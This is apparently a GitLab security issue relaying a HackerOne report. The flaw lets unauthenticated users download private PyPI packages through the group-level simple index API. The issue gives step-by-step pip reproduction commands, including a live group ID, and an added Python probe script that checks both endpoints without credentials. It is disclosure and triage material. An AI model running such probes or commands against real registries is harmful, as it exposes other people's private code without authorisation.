Unauthenticated users can access private PyPI packages that belong to a public group using /api/v4/groups/{id}/-/packages/pypi/simple

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2035173 by js_noob on 2023-06-22, assigned to @ottilia_westerlund:


Report

Summary

Hello team, as known, when a package registry belongs to a private group and Package registry is turned off in the project settings, this should block EVERY SINGLE user from accessing this project's package registries. However, if this project belonged to a public group, ANY UNAUTHENTICATED user can access and download those packages.

Steps to reproduce

As an owner:

  1. Create a new public group
  2. Create a private project in that group, with the content in the following zip file python-package-main.zip
  3. After the project creation change the content of pyproject.toml and add your name and email

image.png

  4. Verify that a pipeline is triggered
  5. Wait a couple of minutes, then navigate to https://gitlab.com/GROUP/PROJECT/-/packages, and verify that a new package is created. Now you can directly jump to step 9, or if you want to add another layer of security you can continue in order. But at this point, no external users should be able to access this package.

image_(1).png

  6. Navigate to the project settings https://gitlab.com/GROUP/PROJECT/edit and disable Package registry

image.png

  7. Let's try to fetch the package as the owner; on your PC terminal run (you can create a PAT here https://gitlab.com/-/profile/personal_access_tokens):

     pip install mypypipackage --index-url https://__token__:OWNER_ACCESS_TOKEN@gitlab.com/api/v4/projects/PROJECT_ID/packages/pypi/simple

  8. Verify that the owner can't access it. Ideally, if the owner can't, no one should be able to, right?

As an unauthenticated user:

  9. Navigate to https://gitlab.com/groups/GROUP/-/packages and verify that there are no packages you have access to
  10. Run the following command in your terminal:

      pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/GROUP_ID/-/packages/pypi/simple

  11. Verify that you can access that private package without using an access token, i.e. without being logged in

As a double check:

You can check my private packages at https://gitlab.com/groups/my-nice-group-new-version/-/packages, and verify that you can't see any packages.
Run the following command and verify that you can download my private package:

    pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/68082643/-/packages/pypi/simple

Video/POC

bandicam_2023-06-22_20-40-23-327.mp4

Impact

Unauthenticated users can access private PyPI packages.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • python-package-main.zip
  • image.png
  • bandicam_2023-06-22_20-40-23-327.mp4
  • image_(1).png
  • image.png

How To Reproduce

Please add reproducibility information to this section:
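The following probe is an added triage helper, not the reporter's script and not GitLab code. It repeats the report's check (an unauthenticated GET against the group-level and project-level PyPI simple index, the two URLs pip derives from the `--index-url` values above) and parses the PEP 503 HTML a simple index returns to decide whether the private package's files are being listed. The `SAMPLE_HTML` below is a constructed simple-index page so the parsing and verdict logic can be exercised offline; the function names and the `pypi-index-probe` user agent are this script's own choices.

```python
"""Unauthenticated probe for GitLab PyPI simple-index endpoints (added example)."""
import sys
import urllib.error
import urllib.request
from html.parser import HTMLParser

# Constructed sample of a PEP 503 simple index page for one package. It is
# shaped like a registry response but was not captured from gitlab.com.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>Links for mypypipackage</title></head>
<body><h1>Links for mypypipackage</h1>
<a href="https://gitlab.com/api/v4/groups/1/-/packages/pypi/files/aa/mypypipackage-0.0.1.tar.gz#sha256=aa">mypypipackage-0.0.1.tar.gz</a><br>
<a href="https://gitlab.com/api/v4/groups/1/-/packages/pypi/files/bb/mypypipackage-0.0.1-py3-none-any.whl#sha256=bb">mypypipackage-0.0.1-py3-none-any.whl</a><br>
</body></html>
"""


class SimpleIndexParser(HTMLParser):
    """Collects (filename, href) pairs from the anchors of a simple index page."""

    def __init__(self):
        super().__init__()
        self.files = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.files.append(("".join(self._text).strip(), self._href))
            self._href = None


def parse_simple_index(html):
    """Return the distribution files a simple index page advertises."""
    parser = SimpleIndexParser()
    parser.feed(html)
    return parser.files


def index_urls(group_id, project_id, package, base="https://gitlab.com"):
    """The per-package index URLs pip requests for the report's two --index-url values."""
    return {
        "group": f"{base}/api/v4/groups/{group_id}/-/packages/pypi/simple/{package}/",
        "project": f"{base}/api/v4/projects/{project_id}/packages/pypi/simple/{package}/",
    }


def classify(status, body):
    """'exposed' when an unauthenticated GET returns a non-empty file listing."""
    if status == 200 and parse_simple_index(body):
        return "exposed"
    return "blocked"


def fetch_unauthenticated(url):
    """GET with no credentials at all; returns (status, body). Network access only."""
    req = urllib.request.Request(url, headers={"User-Agent": "pypi-index-probe"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(group_id, project_id, package):
    """Probe both scopes unauthenticated; a private package should be 'blocked' on both."""
    results = {}
    for scope, url in index_urls(group_id, project_id, package).items():
        status, body = fetch_unauthenticated(url)
        files = [name for name, _ in parse_simple_index(body)]
        results[scope] = (status, classify(status, body), files)
    return results


if __name__ == "__main__":
    if len(sys.argv) == 4:  # usage: probe.py GROUP_ID PROJECT_ID PACKAGE
        for scope, (status, verdict, files) in probe(*sys.argv[1:]).items():
            print(f"{scope:8s} HTTP {status} -> {verdict} {files}")
    else:
        names = [name for name, _ in parse_simple_index(SAMPLE_HTML)]
        print("offline demo:", classify(200, SAMPLE_HTML), names)
```

Run it with the group ID, project ID and package name from a reproduction like the one above; the bug is confirmed when the project scope reports `blocked` while the group scope reports `exposed` with the package's files listed. Any non-200 status is counted as blocked, so the script makes no assumption about whether the server answers an unauthorised request with 401, 403 or 404.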
